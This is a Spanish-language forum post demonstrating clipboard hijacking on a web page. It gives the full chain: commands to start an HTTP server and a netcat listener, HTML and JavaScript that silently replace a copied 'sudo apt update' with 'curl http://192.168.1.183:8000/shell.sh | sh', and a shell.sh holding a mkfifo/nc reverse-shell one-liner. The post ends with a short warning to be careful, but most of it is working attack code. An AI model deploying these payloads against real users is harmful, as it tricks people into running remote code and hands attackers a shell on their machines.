Nota: No sé colocar la imagen más pequeña, mis disculpas
Esto se puede dar en Linux como también en Windows
La pc Kali Linux que es IP 192.168.183
Estará corriendo un servidor Web en el puerto 8000
y será configurada en modo Listener en el puerto 9001 (En este puerto estará en modo escucha esperando conexiones entrantes)
Levantamos el Sever desde el terminal de KaliLinux (192.168.183)
Código: Seleccionar todo
Python3 -m http.server 8000
Habilitamos el modo Listener de conexiones entrantes en el puerto 9001 (192.168.1.183:9001)
Código: Seleccionar todo
nc -lvnp 9001
Creamos el código HTML (index html)
Código: Seleccionar todo
<!-- Esto sería lo que copiaras para pegar en el terminal -->
<p>Codigo para actualizar pip que copiaras y pegaras <3 </p>
<code><p id='copy'>sudo apt update</p></code>
<!-- Este script hará que copies curl http://192.168.1.183:8000/shell.sh | sh\n en lugar del texto dentro de los párrafos -->
<script>
document.getElementById('copy').addEventListener(
'copy', function(e) {
e.clipboardData.setData('text/plain',
<!-- Una vez copies y ejecutes en realidad harás que ejecutes lo que contiene el shell.sh -->
'curl http://192.168.1.183:8000/shell.sh | sh\n'
);
e.preventDefault();
});
</script>
shell.sh
Código: Seleccionar todo
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.183 9001 >/tmp/f
Esto es algo que nos puede pasar a todos por impaciente
novatada o distracción; ten cuidado.
P.D: Gracias por su atención, nunca he sido bueno para explicar sean amables